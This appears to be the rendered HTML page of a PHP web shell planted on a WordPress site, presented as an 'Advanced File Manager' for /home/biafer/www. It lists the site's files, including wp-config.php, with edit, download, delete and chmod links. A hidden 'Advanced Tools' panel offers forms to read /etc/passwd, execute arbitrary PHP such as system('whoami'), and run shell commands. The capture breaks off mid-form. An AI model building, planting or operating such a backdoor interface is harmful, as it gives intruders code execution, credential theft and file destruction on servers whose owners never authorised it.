<!DOCTYPE html>
<html>
<head>
    <title>File Manager</title>
    <style>
        body { font-family: Arial, sans-serif; margin: 20px; background: #f5f5f5; }
        .container { max-width: 1400px; margin: auto; background: white; padding: 20px; border-radius: 8px; box-shadow: 0 2px 4px rgba(0,0,0,0.1); }
        .toolbar { background: #f0f0f0; padding: 10px; margin: 10px 0; border-radius: 5px; }
        .section { margin: 15px 0; padding: 15px; border: 1px solid #ddd; border-radius: 5px; background: #fafafa; }
        .file-table { width: 100%; border-collapse: collapse; margin-top: 10px; }
        .file-table tr:hover { background: #f9f9f9; }
        .file-table td, .file-table th { padding: 8px; border-bottom: 1px solid #eee; text-align: left; }
        .dir-link { color: #0066cc; font-weight: bold; text-decoration: none; }
        .dir-link:hover { text-decoration: underline; }
        .actions form { display: inline; margin: 0 2px; }
        .actions input, .actions button { font-size: 12px; padding: 2px 5px; }
        .breadcrumb { margin: 10px 0; padding: 8px; background: #e8f4f8; border-radius: 4px; }
        button, input[type="submit"] { background: #4CAF50; color: white; border: none; padding: 5px 10px; border-radius: 3px; cursor: pointer; }
        button:hover, input[type="submit"]:hover { background: #45a049; }
        .delete-btn { color: red; }
        textarea { font-family: monospace; }
    </style>
</head>
<body>
<div class="container">
    <h2>📁 Advanced File Manager</h2>
    
    <!-- Current Directory Display -->
    <div class="toolbar">
        <strong>📍 Current Path:</strong> 
        <a href='?dir=%2Fhome%2Fbiafer%2Fwww'>🏠 Home</a> / <a href='?dir=%2Fhome'>home</a> / <a href='?dir=%2Fhome%2Fbiafer'>biafer</a> / <strong>www</strong>    </div>
    
    <!-- Quick Access Buttons -->
    <div class="section" style="background:#e8f5e9">
        <strong>⚡ Quick Access:</strong>
        <a href="?dir=%2Fhome%2Fbiafer%2Fwww">🏠 Root</a> |
        <a href="?dir=/">💻 System Root</a> |
        <a href="?dir=/var/www/html">🌐 Web Root</a> |
        <a href="?dir=/etc">⚙️ /etc</a> |
        <a href="?dir=/home">👤 /home</a> |
        <a href="?dir=/tmp">📦 /tmp</a>
    </div>
    
    <!-- Upload Form -->
    <div class="section">
        <form method="POST" enctype="multipart/form-data">
            <strong>📤 Upload File:</strong>
            <input type="file" name="file" required>
            <input type="submit" value="Upload to Current Directory">
        </form>
    </div>
    
    <!-- Create Form -->
    <div class="section">
        <form method="POST">
            <strong>➕ Create New:</strong>
            <input type="text" name="new_name" placeholder="name" required size="30">
            <select name="item_type">
                <option value="file">📄 File</option>
                <option value="dir">📁 Directory</option>
            </select>
            <input type="submit" name="create_item" value="Create">
        </form>
    </div>
    
    <!-- System Tools -->
    <div class="section" style="background:#fff3e0">
        <details>
            <summary><strong>🔧 Advanced Tools (Click to Expand)</strong></summary>
            <br>
            
            <!-- System File Reader -->
            <form method="POST" style="margin-bottom:15px">
                <strong>📖 Read System File:</strong>
                <input type="text" name="system_file" value="/etc/passwd" size="50">
                <input type="submit" name="read_system" value="Read File">
            </form>
            
            <!-- PHP Code Execution -->
            <form method="POST" style="margin-bottom:15px">
                <strong>🐘 Execute PHP Code:</strong><br>
                <textarea name="execute_code" rows="3" cols="80" placeholder='echo system("whoami");&#10;echo file_get_contents("/etc/passwd");&#10;phpinfo();'></textarea><br>
                <input type="submit" value="Run PHP Code">
            </form>
            
            <!-- System Command -->
            <form method="POST">
                <strong>💻 System Command:</strong>
                <input type="text" name="system_cmd" size="60" placeholder="ls -la, whoami, id, pwd, uname -a">
                <input type="submit" value="Execute Command">
            </form>
        </details>
    </div>
    
    <!-- File Listing -->
    <h3>📂 Directory Contents:</h3>
    <table class="file-table">
        <thead>
            <tr>
                <th>Type</th><th>Name</th><th>Permissions</th><th>Size</th><th colspan="5">Actions</th>
            </tr>
        </thead>
        <tbody>
                    <tr>
                <td>📄</td>
                <td>
                                            .htaccess                                    </td>
                <td style="font-family:monospace; font-size:11px">0644</td>
                <td style="font-size:12px">0.79 KB</td>
                <td class="actions">
                                            <a href="?edit=%2Fhome%2Fbiafer%2Fwww%2F.htaccess&dir=%2Fhome%2Fbiafer%2Fwww">✏️ Edit</a>
                        <a href="?download=%2Fhome%2Fbiafer%2Fwww%2F.htaccess">⬇️ Download</a>
                        <a href="?view=%2Fhome%2Fbiafer%2Fwww%2F.htaccess&dir=%2Fhome%2Fbiafer%2Fwww">👁️ View</a>
                                        
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="rename" value="/home/biafer/www/.htaccess">
                        <input type="hidden" name="dir" value="/home/biafer/www">
                        <input type="text" name="newname" placeholder="new name" size="10">
                        <button type="submit">Rename</button>
                    </form>
                    
                    <a href="?delete=%2Fhome%2Fbiafer%2Fwww%2F.htaccess&dir=%2Fhome%2Fbiafer%2Fwww" 
                       class="delete-btn" 
                       onclick="return confirm('⚠️ Delete .htaccess permanently?')">🗑️ Delete</a>
                    
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="chmod" value="/home/biafer/www/.htaccess">
                        <input type="hidden" name="dir" value="/home/biafer/www">
                        <input type="text" name="perms" placeholder="0755" size="5">
                        <button type="submit">Chmod</button>
                    </form>
                </td>
            </tr>
                        <tr>
                <td>📄</td>
                <td>
                                            .htaccess.bk                                    </td>
                <td style="font-family:monospace; font-size:11px">0644</td>
                <td style="font-size:12px">0.7 KB</td>
                <td class="actions">
                                            <a href="?edit=%2Fhome%2Fbiafer%2Fwww%2F.htaccess.bk&dir=%2Fhome%2Fbiafer%2Fwww">✏️ Edit</a>
                        <a href="?download=%2Fhome%2Fbiafer%2Fwww%2F.htaccess.bk">⬇️ Download</a>
                        <a href="?view=%2Fhome%2Fbiafer%2Fwww%2F.htaccess.bk&dir=%2Fhome%2Fbiafer%2Fwww">👁️ View</a>
                                        
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="rename" value="/home/biafer/www/.htaccess.bk">
                        <input type="hidden" name="dir" value="/home/biafer/www">
                        <input type="text" name="newname" placeholder="new name" size="10">
                        <button type="submit">Rename</button>
                    </form>
                    
                    <a href="?delete=%2Fhome%2Fbiafer%2Fwww%2F.htaccess.bk&dir=%2Fhome%2Fbiafer%2Fwww" 
                       class="delete-btn" 
                       onclick="return confirm('⚠️ Delete .htaccess.bk permanently?')">🗑️ Delete</a>
                    
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="chmod" value="/home/biafer/www/.htaccess.bk">
                        <input type="hidden" name="dir" value="/home/biafer/www">
                        <input type="text" name="perms" placeholder="0755" size="5">
                        <button type="submit">Chmod</button>
                    </form>
                </td>
            </tr>
                        <tr>
                <td>📁</td>
                <td>
                                            <a href="?dir=%2Fhome%2Fbiafer%2Fwww%2F.private" class="dir-link">.private</a>/
                                    </td>
                <td style="font-family:monospace; font-size:11px">0755</td>
                <td style="font-size:12px">-</td>
                <td class="actions">
                                        
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="rename" value="/home/biafer/www/.private">
                        <input type="hidden" name="dir" value="/home/biafer/www">
                        <input type="text" name="newname" placeholder="new name" size="10">
                        <button type="submit">Rename</button>
                    </form>
                    
                    <a href="?delete=%2Fhome%2Fbiafer%2Fwww%2F.private&dir=%2Fhome%2Fbiafer%2Fwww" 
                       class="delete-btn" 
                       onclick="return confirm('⚠️ Delete .private permanently?')">🗑️ Delete</a>
                    
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="chmod" value="/home/biafer/www/.private">
                        <input type="hidden" name="dir" value="/home/biafer/www">
                        <input type="text" name="perms" placeholder="0755" size="5">
                        <button type="submit">Chmod</button>
                    </form>
                </td>
            </tr>
                        <tr>
                <td>📄</td>
                <td>
                                            default.php                                    </td>
                <td style="font-family:monospace; font-size:11px">0644</td>
                <td style="font-size:12px">16.01 KB</td>
                <td class="actions">
                                            <a href="?edit=%2Fhome%2Fbiafer%2Fwww%2Fdefault.php&dir=%2Fhome%2Fbiafer%2Fwww">✏️ Edit</a>
                        <a href="?download=%2Fhome%2Fbiafer%2Fwww%2Fdefault.php">⬇️ Download</a>
                        <a href="?view=%2Fhome%2Fbiafer%2Fwww%2Fdefault.php&dir=%2Fhome%2Fbiafer%2Fwww">👁️ View</a>
                                        
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="rename" value="/home/biafer/www/default.php">
                        <input type="hidden" name="dir" value="/home/biafer/www">
                        <input type="text" name="newname" placeholder="new name" size="10">
                        <button type="submit">Rename</button>
                    </form>
                    
                    <a href="?delete=%2Fhome%2Fbiafer%2Fwww%2Fdefault.php&dir=%2Fhome%2Fbiafer%2Fwww" 
                       class="delete-btn" 
                       onclick="return confirm('⚠️ Delete default.php permanently?')">🗑️ Delete</a>
                    
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="chmod" value="/home/biafer/www/default.php">
                        <input type="hidden" name="dir" value="/home/biafer/www">
                        <input type="text" name="perms" placeholder="0755" size="5">
                        <button type="submit">Chmod</button>
                    </form>
                </td>
            </tr>
                        <tr>
                <td>📄</td>
                <td>
                                            index.php                                    </td>
                <td style="font-family:monospace; font-size:11px">0644</td>
                <td style="font-size:12px">0.4 KB</td>
                <td class="actions">
                                            <a href="?edit=%2Fhome%2Fbiafer%2Fwww%2Findex.php&dir=%2Fhome%2Fbiafer%2Fwww">✏️ Edit</a>
                        <a href="?download=%2Fhome%2Fbiafer%2Fwww%2Findex.php">⬇️ Download</a>
                        <a href="?view=%2Fhome%2Fbiafer%2Fwww%2Findex.php&dir=%2Fhome%2Fbiafer%2Fwww">👁️ View</a>
                                        
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="rename" value="/home/biafer/www/index.php">
                        <input type="hidden" name="dir" value="/home/biafer/www">
                        <input type="text" name="newname" placeholder="new name" size="10">
                        <button type="submit">Rename</button>
                    </form>
                    
                    <a href="?delete=%2Fhome%2Fbiafer%2Fwww%2Findex.php&dir=%2Fhome%2Fbiafer%2Fwww" 
                       class="delete-btn" 
                       onclick="return confirm('⚠️ Delete index.php permanently?')">🗑️ Delete</a>
                    
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="chmod" value="/home/biafer/www/index.php">
                        <input type="hidden" name="dir" value="/home/biafer/www">
                        <input type="text" name="perms" placeholder="0755" size="5">
                        <button type="submit">Chmod</button>
                    </form>
                </td>
            </tr>
                        <tr>
                <td>📄</td>
                <td>
                                            license.txt                                    </td>
                <td style="font-family:monospace; font-size:11px">0644</td>
                <td style="font-size:12px">19.06 KB</td>
                <td class="actions">
                                            <a href="?edit=%2Fhome%2Fbiafer%2Fwww%2Flicense.txt&dir=%2Fhome%2Fbiafer%2Fwww">✏️ Edit</a>
                        <a href="?download=%2Fhome%2Fbiafer%2Fwww%2Flicense.txt">⬇️ Download</a>
                        <a href="?view=%2Fhome%2Fbiafer%2Fwww%2Flicense.txt&dir=%2Fhome%2Fbiafer%2Fwww">👁️ View</a>
                                        
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="rename" value="/home/biafer/www/license.txt">
                        <input type="hidden" name="dir" value="/home/biafer/www">
                        <input type="text" name="newname" placeholder="new name" size="10">
                        <button type="submit">Rename</button>
                    </form>
                    
                    <a href="?delete=%2Fhome%2Fbiafer%2Fwww%2Flicense.txt&dir=%2Fhome%2Fbiafer%2Fwww" 
                       class="delete-btn" 
                       onclick="return confirm('⚠️ Delete license.txt permanently?')">🗑️ Delete</a>
                    
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="chmod" value="/home/biafer/www/license.txt">
                        <input type="hidden" name="dir" value="/home/biafer/www">
                        <input type="text" name="perms" placeholder="0755" size="5">
                        <button type="submit">Chmod</button>
                    </form>
                </td>
            </tr>
                        <tr>
                <td>📄</td>
                <td>
                                            readme.html                                    </td>
                <td style="font-family:monospace; font-size:11px">0644</td>
                <td style="font-size:12px">7.25 KB</td>
                <td class="actions">
                                            <a href="?edit=%2Fhome%2Fbiafer%2Fwww%2Freadme.html&dir=%2Fhome%2Fbiafer%2Fwww">✏️ Edit</a>
                        <a href="?download=%2Fhome%2Fbiafer%2Fwww%2Freadme.html">⬇️ Download</a>
                        <a href="?view=%2Fhome%2Fbiafer%2Fwww%2Freadme.html&dir=%2Fhome%2Fbiafer%2Fwww">👁️ View</a>
                                        
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="rename" value="/home/biafer/www/readme.html">
                        <input type="hidden" name="dir" value="/home/biafer/www">
                        <input type="text" name="newname" placeholder="new name" size="10">
                        <button type="submit">Rename</button>
                    </form>
                    
                    <a href="?delete=%2Fhome%2Fbiafer%2Fwww%2Freadme.html&dir=%2Fhome%2Fbiafer%2Fwww" 
                       class="delete-btn" 
                       onclick="return confirm('⚠️ Delete readme.html permanently?')">🗑️ Delete</a>
                    
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="chmod" value="/home/biafer/www/readme.html">
                        <input type="hidden" name="dir" value="/home/biafer/www">
                        <input type="text" name="perms" placeholder="0755" size="5">
                        <button type="submit">Chmod</button>
                    </form>
                </td>
            </tr>
                        <tr>
                <td>📄</td>
                <td>
                                            wp-activate.php                                    </td>
                <td style="font-family:monospace; font-size:11px">0644</td>
                <td style="font-size:12px">7.18 KB</td>
                <td class="actions">
                                            <a href="?edit=%2Fhome%2Fbiafer%2Fwww%2Fwp-activate.php&dir=%2Fhome%2Fbiafer%2Fwww">✏️ Edit</a>
                        <a href="?download=%2Fhome%2Fbiafer%2Fwww%2Fwp-activate.php">⬇️ Download</a>
                        <a href="?view=%2Fhome%2Fbiafer%2Fwww%2Fwp-activate.php&dir=%2Fhome%2Fbiafer%2Fwww">👁️ View</a>
                                        
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="rename" value="/home/biafer/www/wp-activate.php">
                        <input type="hidden" name="dir" value="/home/biafer/www">
                        <input type="text" name="newname" placeholder="new name" size="10">
                        <button type="submit">Rename</button>
                    </form>
                    
                    <a href="?delete=%2Fhome%2Fbiafer%2Fwww%2Fwp-activate.php&dir=%2Fhome%2Fbiafer%2Fwww" 
                       class="delete-btn" 
                       onclick="return confirm('⚠️ Delete wp-activate.php permanently?')">🗑️ Delete</a>
                    
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="chmod" value="/home/biafer/www/wp-activate.php">
                        <input type="hidden" name="dir" value="/home/biafer/www">
                        <input type="text" name="perms" placeholder="0755" size="5">
                        <button type="submit">Chmod</button>
                    </form>
                </td>
            </tr>
                        <tr>
                <td>📁</td>
                <td>
                                            <a href="?dir=%2Fhome%2Fbiafer%2Fwww%2Fwp-admin" class="dir-link">wp-admin</a>/
                                    </td>
                <td style="font-family:monospace; font-size:11px">0755</td>
                <td style="font-size:12px">-</td>
                <td class="actions">
                                        
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="rename" value="/home/biafer/www/wp-admin">
                        <input type="hidden" name="dir" value="/home/biafer/www">
                        <input type="text" name="newname" placeholder="new name" size="10">
                        <button type="submit">Rename</button>
                    </form>
                    
                    <a href="?delete=%2Fhome%2Fbiafer%2Fwww%2Fwp-admin&dir=%2Fhome%2Fbiafer%2Fwww" 
                       class="delete-btn" 
                       onclick="return confirm('⚠️ Delete wp-admin permanently?')">🗑️ Delete</a>
                    
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="chmod" value="/home/biafer/www/wp-admin">
                        <input type="hidden" name="dir" value="/home/biafer/www">
                        <input type="text" name="perms" placeholder="0755" size="5">
                        <button type="submit">Chmod</button>
                    </form>
                </td>
            </tr>
                        <tr>
                <td>📄</td>
                <td>
                                            wp-blog-header.php                                    </td>
                <td style="font-family:monospace; font-size:11px">0644</td>
                <td style="font-size:12px">0.34 KB</td>
                <td class="actions">
                                            <a href="?edit=%2Fhome%2Fbiafer%2Fwww%2Fwp-blog-header.php&dir=%2Fhome%2Fbiafer%2Fwww">✏️ Edit</a>
                        <a href="?download=%2Fhome%2Fbiafer%2Fwww%2Fwp-blog-header.php">⬇️ Download</a>
                        <a href="?view=%2Fhome%2Fbiafer%2Fwww%2Fwp-blog-header.php&dir=%2Fhome%2Fbiafer%2Fwww">👁️ View</a>
                                        
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="rename" value="/home/biafer/www/wp-blog-header.php">
                        <input type="hidden" name="dir" value="/home/biafer/www">
                        <input type="text" name="newname" placeholder="new name" size="10">
                        <button type="submit">Rename</button>
                    </form>
                    
                    <a href="?delete=%2Fhome%2Fbiafer%2Fwww%2Fwp-blog-header.php&dir=%2Fhome%2Fbiafer%2Fwww" 
                       class="delete-btn" 
                       onclick="return confirm('⚠️ Delete wp-blog-header.php permanently?')">🗑️ Delete</a>
                    
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="chmod" value="/home/biafer/www/wp-blog-header.php">
                        <input type="hidden" name="dir" value="/home/biafer/www">
                        <input type="text" name="perms" placeholder="0755" size="5">
                        <button type="submit">Chmod</button>
                    </form>
                </td>
            </tr>
                        <tr>
                <td>📄</td>
                <td>
                                            wp-config-sample.php                                    </td>
                <td style="font-family:monospace; font-size:11px">0644</td>
                <td style="font-size:12px">3.16 KB</td>
                <td class="actions">
                                            <a href="?edit=%2Fhome%2Fbiafer%2Fwww%2Fwp-config-sample.php&dir=%2Fhome%2Fbiafer%2Fwww">✏️ Edit</a>
                        <a href="?download=%2Fhome%2Fbiafer%2Fwww%2Fwp-config-sample.php">⬇️ Download</a>
                        <a href="?view=%2Fhome%2Fbiafer%2Fwww%2Fwp-config-sample.php&dir=%2Fhome%2Fbiafer%2Fwww">👁️ View</a>
                                        
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="rename" value="/home/biafer/www/wp-config-sample.php">
                        <input type="hidden" name="dir" value="/home/biafer/www">
                        <input type="text" name="newname" placeholder="new name" size="10">
                        <button type="submit">Rename</button>
                    </form>
                    
                    <a href="?delete=%2Fhome%2Fbiafer%2Fwww%2Fwp-config-sample.php&dir=%2Fhome%2Fbiafer%2Fwww" 
                       class="delete-btn" 
                       onclick="return confirm('⚠️ Delete wp-config-sample.php permanently?')">🗑️ Delete</a>
                    
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="chmod" value="/home/biafer/www/wp-config-sample.php">
                        <input type="hidden" name="dir" value="/home/biafer/www">
                        <input type="text" name="perms" placeholder="0755" size="5">
                        <button type="submit">Chmod</button>
                    </form>
                </td>
            </tr>
                        <tr>
                <td>📄</td>
                <td>
                                            wp-config.php                                    </td>
                <td style="font-family:monospace; font-size:11px">0644</td>
                <td style="font-size:12px">2.65 KB</td>
                <td class="actions">
                                            <a href="?edit=%2Fhome%2Fbiafer%2Fwww%2Fwp-config.php&dir=%2Fhome%2Fbiafer%2Fwww">✏️ Edit</a>
                        <a href="?download=%2Fhome%2Fbiafer%2Fwww%2Fwp-config.php">⬇️ Download</a>
                        <a href="?view=%2Fhome%2Fbiafer%2Fwww%2Fwp-config.php&dir=%2Fhome%2Fbiafer%2Fwww">👁️ View</a>
                                        
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="rename" value="/home/biafer/www/wp-config.php">
                        <input type="hidden" name="dir" value="/home/biafer/www">
                        <input type="text" name="newname" placeholder="new name" size="10">
                        <button type="submit">Rename</button>
                    </form>
                    
                    <a href="?delete=%2Fhome%2Fbiafer%2Fwww%2Fwp-config.php&dir=%2Fhome%2Fbiafer%2Fwww" 
                       class="delete-btn" 
                       onclick="return confirm('⚠️ Delete wp-config.php permanently?')">🗑️ Delete</a>
                    
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="chmod" value="/home/biafer/www/wp-config.php">
                        <input type="hidden" name="dir" value="/home/biafer/www">
                        <input type="text" name="perms" placeholder="0755" size="5">
                        <button type="submit">Chmod</button>
                    </form>
                </td>
            </tr>
                        <tr>
                <td>📁</td>
                <td>
                                            <a href="?dir=%2Fhome%2Fbiafer%2Fwww%2Fwp-content" class="dir-link">wp-content</a>/
                                    </td>
                <td style="font-family:monospace; font-size:11px">0755</td>
                <td style="font-size:12px">-</td>
                <td class="actions">
                                        
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="rename" value="/home/biafer/www/wp-content">
                        <input type="hidden" name="dir" value="/home/biafer/www">
                        <input type="text" name="newname" placeholder="new name" size="10">
                        <button type="submit">Rename</button>
                    </form>
                    
                    <a href="?delete=%2Fhome%2Fbiafer%2Fwww%2Fwp-content&dir=%2Fhome%2Fbiafer%2Fwww" 
                       class="delete-btn" 
                       onclick="return confirm('⚠️ Delete wp-content permanently?')">🗑️ Delete</a>
                    
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="chmod" value="/home/biafer/www/wp-content">
                        <input type="hidden" name="dir" value="/home/biafer/www">
                        <input type="text" name="perms" placeholder="0755" size="5">
                        <button type="submit">Chmod</button>
                    </form>
                </td>
            </tr>
                        <tr>
                <td>📄</td>
                <td>
                                            wp-cron.php                                    </td>
                <td style="font-family:monospace; font-size:11px">0644</td>
                <td style="font-size:12px">5.49 KB</td>
                <td class="actions">
                                            <a href="?edit=%2Fhome%2Fbiafer%2Fwww%2Fwp-cron.php&dir=%2Fhome%2Fbiafer%2Fwww">✏️ Edit</a>
                        <a href="?download=%2Fhome%2Fbiafer%2Fwww%2Fwp-cron.php">⬇️ Download</a>
                        <a href="?view=%2Fhome%2Fbiafer%2Fwww%2Fwp-cron.php&dir=%2Fhome%2Fbiafer%2Fwww">👁️ View</a>
                                        
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="rename" value="/home/biafer/www/wp-cron.php">
                        <input type="hidden" name="dir" value="/home/biafer/www">
                        <input type="text" name="newname" placeholder="new name" size="10">
                        <button type="submit">Rename</button>
                    </form>
                    
                    <a href="?delete=%2Fhome%2Fbiafer%2Fwww%2Fwp-cron.php&dir=%2Fhome%2Fbiafer%2Fwww" 
                       class="delete-btn" 
                       onclick="return confirm('⚠️ Delete wp-cron.php permanently?')">🗑️ Delete</a>
                    
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="chmod" value="/home/biafer/www/wp-cron.php">
                        <input type="hidden" name="dir" value="/home/biafer/www">
                        <input type="text" name="perms" placeholder="0755" size="5">
                        <button type="submit">Chmod</button>
                    </form>
                </td>
            </tr>
                        <tr>
                <td>📁</td>
                <td>
                                            <a href="?dir=%2Fhome%2Fbiafer%2Fwww%2Fwp-includes" class="dir-link">wp-includes</a>/
                                    </td>
                <td style="font-family:monospace; font-size:11px">0755</td>
                <td style="font-size:12px">-</td>
                <td class="actions">
                                        
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="rename" value="/home/biafer/www/wp-includes">
                        <input type="hidden" name="dir" value="/home/biafer/www">
                        <input type="text" name="newname" placeholder="new name" size="10">
                        <button type="submit">Rename</button>
                    </form>
                    
                    <a href="?delete=%2Fhome%2Fbiafer%2Fwww%2Fwp-includes&dir=%2Fhome%2Fbiafer%2Fwww" 
                       class="delete-btn" 
                       onclick="return confirm('⚠️ Delete wp-includes permanently?')">🗑️ Delete</a>
                    
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="chmod" value="/home/biafer/www/wp-includes">
                        <input type="hidden" name="dir" value="/home/biafer/www">
                        <input type="text" name="perms" placeholder="0755" size="5">
                        <button type="submit">Chmod</button>
                    </form>
                </td>
            </tr>
                        <tr>
                <td>📄</td>
                <td>
                                            wp-links-opml.php                                    </td>
                <td style="font-family:monospace; font-size:11px">0644</td>
                <td style="font-size:12px">2.43 KB</td>
                <td class="actions">
                                            <a href="?edit=%2Fhome%2Fbiafer%2Fwww%2Fwp-links-opml.php&dir=%2Fhome%2Fbiafer%2Fwww">✏️ Edit</a>
                        <a href="?download=%2Fhome%2Fbiafer%2Fwww%2Fwp-links-opml.php">⬇️ Download</a>
                        <a href="?view=%2Fhome%2Fbiafer%2Fwww%2Fwp-links-opml.php&dir=%2Fhome%2Fbiafer%2Fwww">👁️ View</a>
                                        
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="rename" value="/home/biafer/www/wp-links-opml.php">
                        <input type="hidden" name="dir" value="/home/biafer/www">
                        <input type="text" name="newname" placeholder="new name" size="10">
                        <button type="submit">Rename</button>
                    </form>
                    
                    <a href="?delete=%2Fhome%2Fbiafer%2Fwww%2Fwp-links-opml.php&dir=%2Fhome%2Fbiafer%2Fwww" 
                       class="delete-btn" 
                       onclick="return confirm('⚠️ Delete wp-links-opml.php permanently?')">🗑️ Delete</a>
                    
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="chmod" value="/home/biafer/www/wp-links-opml.php">
                        <input type="hidden" name="dir" value="/home/biafer/www">
                        <input type="text" name="perms" placeholder="0755" size="5">
                        <button type="submit">Chmod</button>
                    </form>
                </td>
            </tr>
                        <tr>
                <td>📄</td>
                <td>
                                            wp-load.php                                    </td>
                <td style="font-family:monospace; font-size:11px">0644</td>
                <td style="font-size:12px">3.84 KB</td>
                <td class="actions">
                                            <a href="?edit=%2Fhome%2Fbiafer%2Fwww%2Fwp-load.php&dir=%2Fhome%2Fbiafer%2Fwww">✏️ Edit</a>
                        <a href="?download=%2Fhome%2Fbiafer%2Fwww%2Fwp-load.php">⬇️ Download</a>
                        <a href="?view=%2Fhome%2Fbiafer%2Fwww%2Fwp-load.php&dir=%2Fhome%2Fbiafer%2Fwww">👁️ View</a>
                                        
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="rename" value="/home/biafer/www/wp-load.php">
                        <input type="hidden" name="dir" value="/home/biafer/www">
                        <input type="text" name="newname" placeholder="new name" size="10">
                        <button type="submit">Rename</button>
                    </form>
                    
                    <a href="?delete=%2Fhome%2Fbiafer%2Fwww%2Fwp-load.php&dir=%2Fhome%2Fbiafer%2Fwww" 
                       class="delete-btn" 
                       onclick="return confirm('⚠️ Delete wp-load.php permanently?')">🗑️ Delete</a>
                    
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="chmod" value="/home/biafer/www/wp-load.php">
                        <input type="hidden" name="dir" value="/home/biafer/www">
                        <input type="text" name="perms" placeholder="0755" size="5">
                        <button type="submit">Chmod</button>
                    </form>
                </td>
            </tr>
                        <tr>
                <td>📄</td>
                <td>
                                            wp-login.php                                    </td>
                <td style="font-family:monospace; font-size:11px">0644</td>
                <td style="font-size:12px">50.23 KB</td>
                <td class="actions">
                                            <a href="?edit=%2Fhome%2Fbiafer%2Fwww%2Fwp-login.php&dir=%2Fhome%2Fbiafer%2Fwww">✏️ Edit</a>
                        <a href="?download=%2Fhome%2Fbiafer%2Fwww%2Fwp-login.php">⬇️ Download</a>
                        <a href="?view=%2Fhome%2Fbiafer%2Fwww%2Fwp-login.php&dir=%2Fhome%2Fbiafer%2Fwww">👁️ View</a>
                                        
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="rename" value="/home/biafer/www/wp-login.php">
                        <input type="hidden" name="dir" value="/home/biafer/www">
                        <input type="text" name="newname" placeholder="new name" size="10">
                        <button type="submit">Rename</button>
                    </form>
                    
                    <a href="?delete=%2Fhome%2Fbiafer%2Fwww%2Fwp-login.php&dir=%2Fhome%2Fbiafer%2Fwww" 
                       class="delete-btn" 
                       onclick="return confirm('⚠️ Delete wp-login.php permanently?')">🗑️ Delete</a>
                    
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="chmod" value="/home/biafer/www/wp-login.php">
                        <input type="hidden" name="dir" value="/home/biafer/www">
                        <input type="text" name="perms" placeholder="0755" size="5">
                        <button type="submit">Chmod</button>
                    </form>
                </td>
            </tr>
                        <tr>
                <td>📄</td>
                <td>
                                            wp-mail.php                                    </td>
                <td style="font-family:monospace; font-size:11px">0644</td>
                <td style="font-size:12px">8.52 KB</td>
                <td class="actions">
                                            <a href="?edit=%2Fhome%2Fbiafer%2Fwww%2Fwp-mail.php&dir=%2Fhome%2Fbiafer%2Fwww">✏️ Edit</a>
                        <a href="?download=%2Fhome%2Fbiafer%2Fwww%2Fwp-mail.php">⬇️ Download</a>
                        <a href="?view=%2Fhome%2Fbiafer%2Fwww%2Fwp-mail.php&dir=%2Fhome%2Fbiafer%2Fwww">👁️ View</a>
                                        
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="rename" value="/home/biafer/www/wp-mail.php">
                        <input type="hidden" name="dir" value="/home/biafer/www">
                        <input type="text" name="newname" placeholder="new name" size="10">
                        <button type="submit">Rename</button>
                    </form>
                    
                    <a href="?delete=%2Fhome%2Fbiafer%2Fwww%2Fwp-mail.php&dir=%2Fhome%2Fbiafer%2Fwww" 
                       class="delete-btn" 
                       onclick="return confirm('⚠️ Delete wp-mail.php permanently?')">🗑️ Delete</a>
                    
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="chmod" value="/home/biafer/www/wp-mail.php">
                        <input type="hidden" name="dir" value="/home/biafer/www">
                        <input type="text" name="perms" placeholder="0755" size="5">
                        <button type="submit">Chmod</button>
                    </form>
                </td>
            </tr>
                        <tr>
                <td>📄</td>
                <td>
                                            wp-settings.php                                    </td>
                <td style="font-family:monospace; font-size:11px">0644</td>
                <td style="font-size:12px">30.33 KB</td>
                <td class="actions">
                                            <a href="?edit=%2Fhome%2Fbiafer%2Fwww%2Fwp-settings.php&dir=%2Fhome%2Fbiafer%2Fwww">✏️ Edit</a>
                        <a href="?download=%2Fhome%2Fbiafer%2Fwww%2Fwp-settings.php">⬇️ Download</a>
                        <a href="?view=%2Fhome%2Fbiafer%2Fwww%2Fwp-settings.php&dir=%2Fhome%2Fbiafer%2Fwww">👁️ View</a>
                                        
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="rename" value="/home/biafer/www/wp-settings.php">
                        <input type="hidden" name="dir" value="/home/biafer/www">
                        <input type="text" name="newname" placeholder="new name" size="10">
                        <button type="submit">Rename</button>
                    </form>
                    
                    <a href="?delete=%2Fhome%2Fbiafer%2Fwww%2Fwp-settings.php&dir=%2Fhome%2Fbiafer%2Fwww" 
                       class="delete-btn" 
                       onclick="return confirm('⚠️ Delete wp-settings.php permanently?')">🗑️ Delete</a>
                    
                    <form method="GET" style="display:inline">
